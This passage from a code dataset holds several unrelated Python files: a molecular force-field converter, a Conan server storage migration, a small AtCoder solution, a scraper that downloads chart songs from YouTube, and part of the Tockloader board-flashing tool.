Qs[i][1]))\n for (x, y) in zip(bnd_df.cl1, bnd_df.cl2):\n rtf.write('BOND %s %s \\n' % (num2typ2symb[x][0], num2typ2symb[y][0]))\n for i in imps:\n rtf.write('IMPR %s \\n' % (i.replace(\"-\", \" \")))\n rtf.write('PATCH FIRST NONE LAST NONE \\n')\n rtf.write('END \\n')\n rtf.close()\n return None\n\n\ndef Boss2CharmmPRM(resid, num2typ2symb, Qs, bnd_df, ang_df, tor_df):\n #### COLLECTING NONBONDING PART #######\n prm = open(resid + '.prm', 'w+')\n prm.write('! generated PRM file for NAMD/CHARMM \\n')\n prm.write('\\nBOND \\n')\n for i in bnd_df.index:\n prm.write('%s %s %4.3f %4.3f \\n' % (num2typ2symb[bnd_df.cl1[i]][\n 2], num2typ2symb[bnd_df.cl2[i]][2], bnd_df.KIJ[i], bnd_df.RIJ[i]))\n prm.write('\\nANGLE \\n')\n for i in ang_df.index:\n prm.write('%s %s %s %4.3f %4.3f \\n' % (num2typ2symb[ang_df.cl1[i]][2], num2typ2symb[\n ang_df.cl2[i]][2], num2typ2symb[ang_df.cl3[i]][2], ang_df.K[i], ang_df.R[i]))\n prm.write('\\nDIHEDRAL \\n')\n if len(tor_df.index) > 0:\n tor_df = tor_df.drop_duplicates(['NAME', 'TY'])\n pro_df = tor_df[tor_df.TY == 'Proper']\n for i in list(pro_df.index):\n ndf = pro_df.iloc[i]\n pro_out = retDihed(ndf.to_dict())\n for i in range(4):\n prm.write('%s' % pro_out[i])\n prm.write(\n 'X X X X 0.00000 1 0.000000 ! WILD CARD FOR MISSING TORSION PARAMETERS\\n')\n prm.write('\\nIMPROPER \\n')\n imp_df = tor_df[tor_df.TY == 'Improper']\n for i in list(imp_df.index):\n ndf = tor_df.iloc[i]\n imp_out = retDihedImp(ndf.to_dict())\n for i in range(len(imp_out)):\n prm.write('%s' % imp_out[i])\n prm.write(\n 'X X X X 0.00000 1 0.000000 ! WILD CARD FOR MISSING IMPROPER PARAMETERS \\n')\n prm.write(\n '\\nNONBONDED nbxmod 5 atom cdiel switch vatom vdistance vswitch - \\ncutnb 14.0 ctofnb 12.0 ctonnb 11.5 eps 1.0 e14fac 0.5 geom\\n')\n Qlines = ['%s 0.00 %3.6f %3.6f 0.00 %3.6f %3.6f \\n' %\n (num2typ2symb[i][2], float(Qs[i][3]) * -1.00, float(Qs[i][2]) * 0.561231, float(Qs[i][3]) * -0.50,\n float(Qs[i][2]) * 0.561231) for i in range(len(Qs))]\n for i in range(len(Qlines)):\n prm.write('%s' % Qlines[i])\n prm.close()\n return None\n\n\ndef Boss2CharmmTorsion(bnd_df, num2opls, st_no, molecule_data, num2typ2symb):\n dhd = []\n for line in molecule_data.MolData['TORSIONS']:\n dt = [float(l) for l in line]\n dhd.append(dt)\n dhd = np.array(dhd)\n dhd = dhd # kcal to kj conversion\n dhd = dhd / 2.0 # Komm = Vopls/2\n dhd_df = pd.DataFrame(dhd, columns=['V1', 'V2', 'V3', 'V4'])\n ats = []\n for line in molecule_data.MolData['ATOMS'][3:]:\n dt = [line.split()[0], line.split()[4],\n line.split()[6], line.split()[8]]\n dt = [int(d) for d in dt]\n ats.append(dt)\n for line in molecule_data.MolData['ADD_DIHED']:\n dt = [int(l) for l in line]\n ats.append(dt)\n assert len(ats) == len(\n dhd), 'Number of Dihedral angles in Zmatrix and Out file dont match'\n ats = np.array(ats) - st_no\n for i in range(len(ats)):\n for j in range(len(ats[0])):\n if ats[i][j] < 0:\n ats[i][j] = 0\n at_df = pd.DataFrame(ats, columns=['I', 'J', 'K', 'L'])\n final_df = pd.concat([dhd_df, at_df], axis=1)\n final_df = final_df.reindex(at_df.index)\n bndlist = list(bnd_df.UR) + (list(bnd_df.UR))\n final_df['TY'] = ['Proper' if ucomb(list([final_df.I[n], final_df.J[n], final_df.K[\n n], final_df.L[n]]), bndlist) == 3 else 'Improper' for n in range(len(final_df.I))]\n final_df['TI'] = [num2typ2symb[j][2] for j in final_df.I]\n final_df['TJ'] = [num2typ2symb[j][2] for j in final_df.J]\n final_df['TK'] = [num2typ2symb[j][2] for j in final_df.K]\n final_df['TL'] = [num2typ2symb[j][2] for j in final_df.L]\n final_df['SYMB'] = ['-'.join([num2typ2symb[final_df.I[i]][0], num2typ2symb[final_df.J[i]][\n 0], num2typ2symb[final_df.K[i]][0], num2typ2symb[final_df.L[i]][0]]) for i in final_df.index]\n if len(final_df.index) > 0:\n final_df['NAME'] = final_df.TI + '-' + final_df.TJ + \\\n '-' + final_df.TK + '-' + final_df.TL\n return final_df\n\n\ndef boss2CharmmBond(molecule_data, st_no):\n bdat = molecule_data.MolData['BONDS']\n bdat['cl1'] = [x - st_no if not x - st_no < 0 else 0 for x in bdat['cl1']]\n bdat['cl2'] = [x - st_no if not x - st_no < 0 else 0 for x in bdat['cl2']]\n bnd_df = pd.DataFrame(bdat)\n bnd_df['UF'] = ((bnd_df.cl1 + bnd_df.cl2) *\n (bnd_df.cl1 + bnd_df.cl2 + 1) * 0.5) + bnd_df.cl2\n bnd_df['UR'] = ((bnd_df.cl1 + bnd_df.cl2) *\n (bnd_df.cl1 + bnd_df.cl2 + 1) * 0.5) + bnd_df.cl1\n hb_df = bnd_df.drop(['cl1', 'cl2', 'UF', 'UR'], 1)\n hb_df = hb_df.drop_duplicates()\n return bnd_df\n\n\ndef boss2CharmmAngle(anglefile, num2opls, st_no):\n adat = anglefile\n adat['cl1'] = [x - st_no if not x - st_no < 0 else 0 for x in adat['cl1']]\n adat['cl2'] = [x - st_no if not x - st_no < 0 else 0 for x in adat['cl2']]\n adat['cl3'] = [x - st_no if not x - st_no < 0 else 0 for x in adat['cl3']]\n ang_df = pd.DataFrame(adat)\n ang_df = ang_df[ang_df.K > 0]\n ang_df['TY'] = np.array([num2opls[i] + '-' + num2opls[j] + '-' + num2opls[k]\n for i, j, k in zip(ang_df.cl1, ang_df.cl2, ang_df.cl3)])\n return ang_df\n\n\ndef bossData(molecule_data):\n ats_file = molecule_data.MolData['ATOMS']\n types = []\n for i in enumerate(ats_file):\n types.append([i[1].split()[1], 'opls_' + i[1].split()[2]])\n st_no = 3\n Qs = molecule_data.MolData['Q_LJ']\n assert len(Qs) == len(types), 'Please check the at_info and Q_LJ_dat files'\n num2opls = {}\n for i in range(0, len(types)):\n num2opls[i] = Qs[i][0]\n num2typ2symb = {i: types[i] for i in range(len(Qs))}\n for i in range(len(Qs)):\n num2typ2symb[i].append(bossPdbAtom2Element(\n num2typ2symb[i][0]) + num2typ2symb[i][1][-3:])\n num2typ2symb[i].append(bossPdbAtom2Element(num2typ2symb[i][0]))\n num2typ2symb[i].append(bossElement2Mass(num2typ2symb[i][3]))\n num2typ2symb[i].append(Qs[i][0])\n return (types, Qs, num2opls, st_no, num2typ2symb)\n\n\ndef Boss2Charmm(resid, molecule_data):\n types, Qs, num2opls, st_no, num2typ2symb = bossData(molecule_data)\n bnd_df = boss2CharmmBond(molecule_data, st_no)\n ang_df = boss2CharmmAngle(molecule_data.MolData['ANGLES'], num2opls, st_no)\n tor_df = Boss2CharmmTorsion(bnd_df, num2opls, st_no,\n molecule_data, num2typ2symb)\n Boss2CharmmRTF(num2typ2symb, Qs, resid, bnd_df, list(\n tor_df[tor_df.TY == 'Improper']['SYMB']))\n Boss2CharmmPRM(resid, num2typ2symb, Qs, bnd_df, ang_df, tor_df)\n return None\n\n\ndef mainBOSS2CHARMM(resid, clu=False):\n mol = pickle.load(open(resid + \".p\", \"rb\"))\n Boss2Charmm(resid, mol)\n return None\n","sub_path":"LigParGen/BOSS2CHARMM.py","file_name":"BOSS2CHARMM.py","file_ext":"py","file_size_in_byte":8955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"52632465","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\nmusic = pd.read_csv(\"featuresdf.csv\")\n\n# Get artists and song names for tracks with danceability scores over 0.8 and loudness scores below 5.0.\nplaylist = [(track, artist, dance, vol) for track, artist, dance, vol\n in zip(music.name, music.artists, music.danceability, music.loudness)\n if dance > 0.8 and vol < 5.0]\n\n# Sort tracks in decending order of danceability score, so most danceable tracks are on top.\npretty_playlist = sorted(playlist, key=lambda x: x[2], reverse=True)\n\n# Print top 5 tracks\nfor song in pretty_playlist[:5]:\n print(song)\n","sub_path":"Student/briadean/lesson01/comprehensions.py","file_name":"comprehensions.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"213049956","text":"import os\nimport shutil\n\nfrom conans import DEFAULT_REVISION_V1\nfrom conans.migrations import Migrator\nfrom conans.model.version import Version\nfrom conans.paths import PACKAGES_FOLDER\nfrom conans.server.revision_list import RevisionList\nfrom conans.server.store.server_store import REVISIONS_FILE\nfrom conans.util.files import list_folder_subdirs, mkdir, rmdir, save\nfrom conans.util.log import logger\n\n\nclass ServerMigrator(Migrator):\n\n def __init__(self, conf_path, store_path, current_version, out, force_migrations):\n self.force_migrations = force_migrations\n super(ServerMigrator, self).__init__(conf_path, store_path, current_version, out)\n\n def _make_migrations(self, old_version):\n # ############### FILL THIS METHOD WITH THE REQUIRED ACTIONS ##############\n\n # VERSION 0.1\n if old_version == Version(\"0.1\"):\n # Remove config, conans, all!\n self.out.warn(\"Reseting configuration and storage files...\")\n if self.conf_path:\n rmdir(self.conf_path)\n if self.store_path:\n rmdir(self.store_path)\n\n if old_version < Version(\"1.10.0\"):\n if not os.path.exists(self.store_path) or not os.listdir(self.store_path):\n # Empty storage\n return\n try:\n self.migrate_to_revisions_layout()\n except Exception as e:\n print(\"An error ocurred during the migration, please restore the backup directory \"\n \"and try again\")\n print(e)\n exit(1)\n\n # ########################################################################\n\n def migrate_to_revisions_layout(self):\n # .conan/data/lib/1.0/user/channel/export/*\n # .conan/data/lib/1.0/user/channel/0/export/*\n\n # .conan/data/lib/1.0/user/channel/package/*\n # .conan/data/lib/1.0/user/channel/0/package/*\n\n # .conan/data/lib/1.0/user/channel/package/XXX/*\n # .conan/data/lib/1.0/user/channel/0/package/XXX/0/*\n if not self.force_migrations:\n print(\"**********************************************\")\n print(\"* *\")\n print(\"* ERROR: STORAGE MIGRATION NEEDED! *\")\n print(\"* *\")\n print(\"**********************************************\")\n msg = \"A migration of your storage is needed, please backup first the storage \" \\\n \"directory and run:\\n\\n$ conan_server --migrate\\n\\n\"\n logger.error(msg)\n print(msg)\n exit(3) # Gunicorn expects error code 3 to stop retrying booting the worker\n\n print(\"**********************************************\")\n print(\"* *\")\n print(\"* MIGRATION IN PROGRESS *\")\n print(\"* *\")\n print(\"**********************************************\")\n subdirs = list_folder_subdirs(basedir=self.store_path, level=4)\n for subdir in subdirs:\n base_dir = os.path.join(self.store_path, subdir)\n for export_or_package in os.listdir(base_dir):\n the_dir = os.path.join(base_dir, export_or_package)\n dest_dir = os.path.join(base_dir, DEFAULT_REVISION_V1)\n mkdir(dest_dir)\n print(\"Moving '%s': %s\" % (subdir, export_or_package))\n shutil.move(the_dir, dest_dir)\n\n rev_list = RevisionList()\n rev_list.add_revision(DEFAULT_REVISION_V1)\n save(os.path.join(base_dir, REVISIONS_FILE), rev_list.dumps())\n\n packages_dir = os.path.join(self.store_path, subdir, DEFAULT_REVISION_V1,\n PACKAGES_FOLDER)\n\n if not os.path.exists(packages_dir):\n print(\"NO PACKAGES\")\n continue\n for pid in os.listdir(packages_dir):\n package_dir = os.path.join(packages_dir, pid)\n mkdir(os.path.join(package_dir, DEFAULT_REVISION_V1))\n print(\" - Package '%s'\" % pid)\n for item in os.listdir(package_dir):\n if item == DEFAULT_REVISION_V1:\n continue\n origin_path = os.path.join(package_dir, item)\n dest_path = os.path.join(package_dir, DEFAULT_REVISION_V1, item)\n mkdir(dest_dir)\n shutil.move(origin_path, dest_path)\n rev_list = RevisionList()\n rev_list.add_revision(DEFAULT_REVISION_V1)\n save(os.path.join(package_dir, REVISIONS_FILE), rev_list.dumps())\n print(\"**********************************************\")\n print(\"* *\")\n print(\"* MIGRATION COMPLETED! *\")\n print(\"* *\")\n print(\"**********************************************\")\n","sub_path":"conans/server/migrations.py","file_name":"migrations.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"156060872","text":"#!/usr/bin/env python3\n# coding:utf-8\n\nss = {}\nn = int(input())\nfor i in range(n):\n s = input()\n if s in ss:\n ss[s] += 1\n else:\n ss[s] = 1\nprint(max(ss, key=ss.get))\n","sub_path":"atcoder/ABC/008/abc08b.py","file_name":"abc08b.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"424404694","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom youtube_dl import YoutubeDL\nimport pyexcel\n\n\n#Part 1:\nurl = \"https://www.apple.com/itunes/charts/songs/\"\n\n# Running once to open and read url\nconn = urlopen(url)\n\ncontent = conn.read().decode('utf-8')\n\nsoup = BeautifulSoup(content, 'html.parser')\n\ndiv_list = soup.find_all(name = 'div', attrs= {'section-content'})\n\nul = div_list[1].ul\nsong_list = ul.find_all('li')\n\nsong_dic = []\n\nfor song in song_list:\n name = song.h3.a.string\n artist = song.h4.a.string\n dic = {}\n dic['name'] = name\n dic['artist'] = artist\n song_dic.append(dic)\n\npyexcel.save_as(records = song_dic, dest_file_name = 'List_of_songs.xlsx')\n\n#Part 2:\n\nfor song in song_dic:\n options = {\n 'format' : 'bestaudio/audio',\n 'default_search' : 'ytsearch',\n 'max_downloads' : 1\n}\n\n dl = YoutubeDL(options)\n dl.download([song['name'] + ' ' + song['artist']])\n\n","sub_path":"Lab02/HW/itunes_ex.py","file_name":"itunes_ex.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"434680458","text":"#!/usr/bin/env python3\n\nimport argparse\nimport atexit\nimport binascii\nimport contextlib\nimport glob\nimport json\nimport os\nimport struct\nimport subprocess\nimport sys\nimport tarfile\nimport tempfile\nimport time\n\nimport argcomplete\nimport colorama\nimport crcmod\nimport pytoml\nimport serial\nimport serial.tools.list_ports\nimport serial.tools.miniterm\n\nfrom ._version import __version__\n\n\n################################################################################\n## Niceties and Support\n################################################################################\n\nfrom serial.tools import list_ports_common\n\ndef set_terminal_title(title):\n\tprint(colorama.ansi.set_title(title))\n\ndef set_terminal_title_from_port_info(info):\n\textras = ['Tockloader']\n\tif info.manufacturer and info.manufacturer != 'n/a':\n\t\textras.append(info.manufacturer)\n\tif info.name and info.name != 'n/a':\n\t\textras.append(info.name)\n\tif info.description and info.description != 'n/a':\n\t\textras.append(info.description)\n\t#if info.hwid and info.hwid != 'n/a':\n\t#\textras.append(info.hwid)\n\tif info.product and info.product != 'n/a':\n\t\tif info.product != info.description:\n\t\t\textras.append(info.product)\n\ttitle = ' : '.join(extras)\n\n\tset_terminal_title(title)\n\ndef set_terminal_title_from_port(port):\n\tset_terminal_title('Tockloader : ' + port)\n\n# Cleanup any title the program may set\natexit.register(set_terminal_title, '')\n\ndef menu(options, *,\n\t\treturn_type,\n\t\tdefault_index=0,\n\t\tprompt='Which option? '\n\t\t):\n\t'''Present a menu of choices to a user\n\n\t`options` should be a like-list object whose iterated objects can be coerced\n\tinto strings.\n\n\t`return_type` must be set to one of\n\t - \"index\" - for the index into the options array\n\t - \"value\" - for the option value chosen\n\n\t`default_index` is the index to present as the default value (what happens\n\tif the user simply presses enter). Passing `None` disables default\n\tselection.\n\t'''\n\tprint()\n\tfor i,opt in enumerate(options):\n\t\tprint('[{}]\\t{}'.format(i, opt))\n\tif default_index is not None:\n\t\tprompt += '[{}] '.format(default_index)\n\tprint()\n\n\tresp = input(prompt)\n\tif resp == '':\n\t\tresp = default_index\n\telse:\n\t\ttry:\n\t\t\tresp = int(resp)\n\t\t\tif resp < 0 or resp > len(options):\n\t\t\t\traise ValueError\n\t\texcept:\n\t\t\treturn menu(options, return_type=return_type,\n\t\t\t\t\tdefault_index=default_index, prompt=prompt)\n\n\tif return_type == 'index':\n\t\treturn resp\n\telif return_type == 'value':\n\t\treturn options[resp]\n\telse:\n\t\traise NotImplementedError('Menu caller asked for bad return_type')\n\nclass TockLoaderException(Exception):\n\tpass\n\n################################################################################\n## Main TockLoader Interface\n################################################################################\n\nclass TockLoader:\n\n\tdef __init__ (self, args):\n\t\tself.args = args\n\n\t\t# Get an object that allows talking to the board\n\t\tif hasattr(self.args, 'jtag') and self.args.jtag:\n\t\t\tself.channel = JLinkExe(args)\n\t\telse:\n\t\t\tself.channel = BootloaderSerial(args)\n\n\n\t# Open the correct channel to talk to the board.\n\t#\n\t# For the bootloader, this means opening a serial port.\n\t# For JTAG, not much needs to be done.\n\tdef open (self, args):\n\t\tself.channel.open_link_to_board()\n\n\n\t# Tell the bootloader to save the binary blob to an address in internal\n\t# flash.\n\t#\n\t# This will pad the binary as needed, so don't worry about the binary being\n\t# a certain length.\n\tdef flash_binary (self, binary, address):\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\t\t\tself.channel.flash_binary(address, binary)\n\n\n\t# Run miniterm for receiving data from the board.\n\tdef run_terminal (self):\n\t\tprint('Listening for serial output.')\n\n\t\t# Use trusty miniterm\n\t\tminiterm = serial.tools.miniterm.Miniterm(\n\t\t\tself.channel.get_serial_port(),\n\t\t\techo=False,\n\t\t\teol='crlf',\n\t\t\tfilters=['default'])\n\n\t\t# Ctrl+c to exit.\n\t\tminiterm.exit_character = serial.tools.miniterm.unichr(0x03)\n\t\tminiterm.set_rx_encoding('UTF-8')\n\t\tminiterm.set_tx_encoding('UTF-8')\n\n\t\tminiterm.start()\n\t\ttry:\n\t\t\tminiterm.join(True)\n\t\texcept KeyboardInterrupt:\n\t\t\tpass\n\t\tminiterm.join()\n\t\tminiterm.close()\n\n\n\t# Query the chip's flash to determine which apps are installed.\n\tdef list_apps (self, address, verbose, quiet):\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\t# Get all apps based on their header\n\t\t\tapps = self._extract_all_app_headers(address)\n\n\t\t\tself._print_apps(apps, verbose, quiet)\n\n\n\t# Add or update TABs on the board.\n\t#\n\t# `replace` can be either \"yes\", \"no\", or \"only\"\n\tdef install (self, tabs, address, replace='yes'):\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\t# Start with the apps we are searching for.\n\t\t\treplacement_apps = self._extract_apps_from_tabs(tabs)\n\n\t\t\t# Get a list of installed apps\n\t\t\texisting_apps = self._extract_all_app_headers(address)\n\n\t\t\t# What apps we want after this command completes\n\t\t\tresulting_apps = []\n\n\t\t\t# Whether we actually made a change or not\n\t\t\tchanged = False\n\n\t\t\t# Check to see if this app is in there\n\t\t\tif replace == 'yes' or replace == 'only':\n\t\t\t\tfor existing_app in existing_apps:\n\t\t\t\t\tfor replacement_app in replacement_apps:\n\t\t\t\t\t\tif existing_app['name'] == replacement_app['name']:\n\t\t\t\t\t\t\tresulting_apps.append(replacement_app)\n\t\t\t\t\t\t\tchanged = True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\t# We did not find a replacement app. That means we want\n\t\t\t\t\t\t# to keep the original.\n\t\t\t\t\t\tresulting_apps.append(existing_app)\n\n\t\t\t\t# Now, if we want a true install, and not an update, make sure\n\t\t\t\t# we add all apps that did not find a replacement on the board.\n\t\t\t\tif replace == 'yes':\n\t\t\t\t\tfor replacement_app in replacement_apps:\n\t\t\t\t\t\tfor resulting_app in resulting_apps:\n\t\t\t\t\t\t\tif replacement_app['name'] == resulting_app['name']:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t# We did not find the name in the resulting apps.\n\t\t\t\t\t\t\t# Add it.\n\t\t\t\t\t\t\tresulting_apps.append(replacement_app)\n\t\t\t\t\t\t\tchanged = True\n\n\t\t\telif replace == 'no':\n\t\t\t\t# Just add the apps\n\t\t\t\tresulting_apps = existing_apps + replacement_apps\n\t\t\t\tchanged = True\n\n\t\t\tif changed:\n\t\t\t\t# Since something is now different, update all of the apps\n\t\t\t\tself._reshuffle_apps(address, resulting_apps)\n\t\t\telse:\n\t\t\t\t# Nothing changed, so we can raise an error\n\t\t\t\traise TockLoaderException('Nothing found to update')\n\n\n\t# If an app by this name exists, remove it from the chip\n\tdef uninstall_app (self, app_names, address):\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\t# Get a list of installed apps\n\t\t\tapps = self._extract_all_app_headers(address)\n\n\t\t\t# Remove the apps if they are there\n\t\t\tremoved = False\n\t\t\tkeep_apps = []\n\t\t\tfor app in apps:\n\t\t\t\tif app['name'] not in app_names:\n\t\t\t\t\tkeep_apps.append(app)\n\t\t\t\telse:\n\t\t\t\t\tremoved = True\n\n\t\t\t# Now take the remaining apps and make sure they\n\t\t\t# are on the board properly.\n\t\t\tself._reshuffle_apps(address, keep_apps)\n\n\t\t\tif not removed:\n\t\t\t\traise TockLoaderException('Could not find any apps on the board to remove.')\n\n\n\t# Erase flash where apps go\n\tdef erase_apps (self, address):\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\t# Then erase the next page. This ensures that flash is clean at the\n\t\t\t# end of the installed apps and makes things nicer for future uses of\n\t\t\t# this script.\n\t\t\tself.channel.erase_page(address)\n\n\n\t# Download all attributes stored on the board\n\tdef list_attributes (self):\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\tif not self._bootloader_is_present():\n\t\t\t\traise TockLoaderException('No bootloader found! That means there is nowhere for attributes to go.')\n\n\t\t\tself._print_attributes(self.channel.get_all_attributes())\n\n\n\t# Download all attributes stored on the board\n\tdef set_attribute (self, key, value):\n\t\t# Do some checking\n\t\tif len(key.encode('utf-8')) > 8:\n\t\t\traise TockLoaderException('Key is too long. Must be 8 bytes or fewer.')\n\t\tif len(value.encode('utf-8')) > 55:\n\t\t\traise TockLoaderException('Value is too long. Must be 55 bytes or fewer.')\n\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\tif not self._bootloader_is_present():\n\t\t\t\traise TockLoaderException('No bootloader found! That means there is nowhere for attributes to go.')\n\n\t\t\t# Create the buffer to write as the attribute\n\t\t\tout = bytes([])\n\t\t\t# Add key\n\t\t\tout += key.encode('utf-8')\n\t\t\tout += bytes([0] * (8-len(out)))\n\t\t\t# Add length\n\t\t\tout += bytes([len(value.encode('utf-8'))])\n\t\t\t# Add value\n\t\t\tout += value.encode('utf-8')\n\n\t\t\t# Find if this attribute key already exists\n\t\t\topen_index = -1\n\t\t\tfor index, attribute in enumerate(self.channel.get_all_attributes()):\n\t\t\t\tif attribute:\n\t\t\t\t\tif attribute['key'] == key:\n\t\t\t\t\t\tprint('Found existing key at slot {}. Overwriting.'.format(index))\n\t\t\t\t\t\tself.channel.set_attribute(index, out)\n\t\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\t# Save where we should put this attribute if it does not\n\t\t\t\t\t# already exist.\n\t\t\t\t\tif open_index == -1:\n\t\t\t\t\t\topen_index = index\n\t\t\telse:\n\t\t\t\tif open_index == -1:\n\t\t\t\t\traise TockLoaderException('Error: No open space to save this attribute.')\n\t\t\t\telse:\n\t\t\t\t\tprint('Key not found. Writing new attribute to slot {}'.format(open_index))\n\t\t\t\t\tself.channel.set_attribute(open_index, out)\n\n\n\t# Remove an existing attribute already stored on the board\n\tdef remove_attribute (self, key):\n\t\t# Do some checking\n\t\tif len(key.encode('utf-8')) > 8:\n\t\t\traise TockLoaderException('Key is too long. Must be 8 bytes or fewer.')\n\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\tif not self._bootloader_is_present():\n\t\t\t\traise TockLoaderException('No bootloader found! That means there is nowhere for attributes to go.')\n\n\t\t\t# Create a null buffer to overwrite with\n\t\t\tout = bytes([0]*9)\n\n\t\t\t# Find if this attribute key already exists\n\t\t\tfor index, attribute in enumerate(self.channel.get_all_attributes()):\n\t\t\t\tif attribute and attribute['key'] == key:\n\t\t\t\t\tprint('Found existing key at slot {}. Removing.'.format(index))\n\t\t\t\t\tself.channel.set_attribute(index, out)\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\traise TockLoaderException('Error: Attribute does not exist.')\n\n\n\t# Print all info about this board.\n\tdef info (self, app_address):\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\t# Print all apps\n\t\t\tprint('Apps:')\n\t\t\tapps = self._extract_all_app_headers(app_address)\n\t\t\tself._print_apps(apps, True, False)\n\n\t\t\tif self._bootloader_is_present():\n\t\t\t\t# Print all attributes\n\t\t\t\tprint('Attributes:')\n\t\t\t\tattributes = self.channel.get_all_attributes()\n\t\t\t\tself._print_attributes(attributes)\n\t\t\t\tprint('')\n\n\t\t\t\t# Show bootloader version\n\t\t\t\tversion = self.channel.get_bootloader_version()\n\t\t\t\tif version == None:\n\t\t\t\t\tversion = 'unknown'\n\t\t\t\tprint('Bootloader version: {}'.format(version))\n\t\t\telse:\n\t\t\t\tprint('No bootloader.')\n\n\t############################################################################\n\t## Internal Helper Functions for Communicating with Boards\n\t############################################################################\n\n\t# Based on the transport method used, there may be some setup required\n\t# to connect to the board. This function runs the setup needed to connect\n\t# to the board. It also times the operation.\n\t#\n\t# For the bootloader, the board needs to be reset and told to enter the\n\t# bootloader mode.\n\t# For JTAG, this is unnecessary.\n\t@contextlib.contextmanager\n\tdef _start_communication_with_board (self):\n\t\t# Time the operation\n\t\tthen = time.time()\n\t\ttry:\n\t\t\tself.channel.enter_bootloader_mode()\n\n\t\t\t# Now that we have connected to the board and the bootloader\n\t\t\t# if necessary, make sure we know what kind of board we are\n\t\t\t# talking to.\n\t\t\tself.channel.determine_current_board()\n\n\t\t\tyield\n\n\t\t\tnow = time.time()\n\t\t\tprint('Finished in {:0.3f} seconds'.format(now-then))\n\t\texcept Exception as e:\n\t\t\traise(e)\n\t\tfinally:\n\t\t\tself.channel.exit_bootloader_mode()\n\n\t# Check if a bootloader exists on this board. It is specified by the\n\t# string \"TOCKBOOTLOADER\" being at address 0x400.\n\tdef _bootloader_is_present (self):\n\t\t# Check to see if the channel already knows this. For example,\n\t\t# if you are connected via a serial link to the bootloader,\n\t\t# then obviously the bootloader is present.\n\t\tif self.channel.bootloader_is_present() == True:\n\t\t\treturn True\n\n\t\t# Otherwise check for the bootloader flag in the flash.\n\n\t\t# Constants for the bootloader flag\n\t\taddress = 0x400\n\t\tlength = 14\n\t\tflag = self.channel.read_range(address, length)\n\t\tflag_str = flag.decode('utf-8')\n\t\tif self.args.debug:\n\t\t\tprint('Read from flags location: {}'.format(flag_str))\n\t\treturn flag_str == 'TOCKBOOTLOADER'\n\n\n\t############################################################################\n\t## Helper Functions for Manipulating Binaries and TBF\n\t############################################################################\n\n\t# Given an array of apps, some of which are new and some of which exist,\n\t# sort them in flash so they are in descending size order.\n\tdef _reshuffle_apps(self, address, apps):\n\t\t# We are given an array of apps. First we need to order them by size.\n\t\tapps.sort(key=lambda x: x['header']['total_size'], reverse=True)\n\n\t\t# Now iterate to see if the address has changed\n\t\tstart_address = address\n\t\tfor app in apps:\n\t\t\t# If the address already matches, then we are good.\n\t\t\t# On to the next app.\n\t\t\tif app['address'] != start_address:\n\t\t\t\t# If they don't, then we need to read the binary out of\n\t\t\t\t# flash and save it to be moved, as well as update the address.\n\t\t\t\t# However, we may have a new binary to use, so we don't need to\n\t\t\t\t# fetch it.\n\t\t\t\tif 'binary' not in app:\n\t\t\t\t\tapp['binary'] = self.channel.read_range(app['address'], app['header']['total_size'])\n\n\t\t\t\t# Either way save the new address.\n\t\t\t\tapp['address'] = start_address\n\n\t\t\tstart_address += app['header']['total_size']\n\n\t\t# Now flash all apps that have a binary field. The presence of the\n\t\t# binary indicates that they are new or moved.\n\t\tend = address\n\t\tfor app in apps:\n\t\t\tif 'binary' in app:\n\t\t\t\tself.channel.flash_binary(app['address'], app['binary'])\n\t\t\tend = app['address'] + app['header']['total_size']\n\n\t\t# Then erase the next page. This ensures that flash is clean at the\n\t\t# end of the installed apps and makes things nicer for future uses of\n\t\t# this script.\n\t\tself.channel.erase_page(end)\n\n\t# Iterate through the flash on the board for\n\t# the header information about each app.\n\tdef _extract_all_app_headers (self, address):\n\t\tapps = []\n\n\t\t# Jump through the linked list of apps\n\t\twhile (True):\n\t\t\theader_length = 76 # Version 1\n\t\t\tflash = self.channel.read_range(address, header_length)\n\n\t\t\t# if there was an error, the binary array will be empty\n\t\t\tif len(flash) < header_length:\n\t\t\t\tbreak\n\n\t\t\t# Get all the fields from the header\n\t\t\ttbfh = parse_tbf_header(flash)\n\n\t\t\tif tbfh['valid']:\n\t\t\t\t# Get the name out of the app\n\t\t\t\tname = self._get_app_name(address+tbfh['package_name_offset'], tbfh['package_name_size'])\n\n\t\t\t\tapps.append({\n\t\t\t\t\t'address': address,\n\t\t\t\t\t'header': tbfh,\n\t\t\t\t\t'name': name,\n\t\t\t\t})\n\n\t\t\t\taddress += tbfh['total_size']\n\n\t\t\telse:\n\t\t\t\tbreak\n\n\t\treturn apps\n\n\t# Iterate through the list of TABs and create the app dict for each.\n\tdef _extract_apps_from_tabs (self, tabs):\n\t\tapps = []\n\n\t\t# This is the architecture we need for the board\n\t\tarch = self.channel.get_board_arch()\n\n\t\tfor tab in tabs:\n\t\t\tif self.args.force or 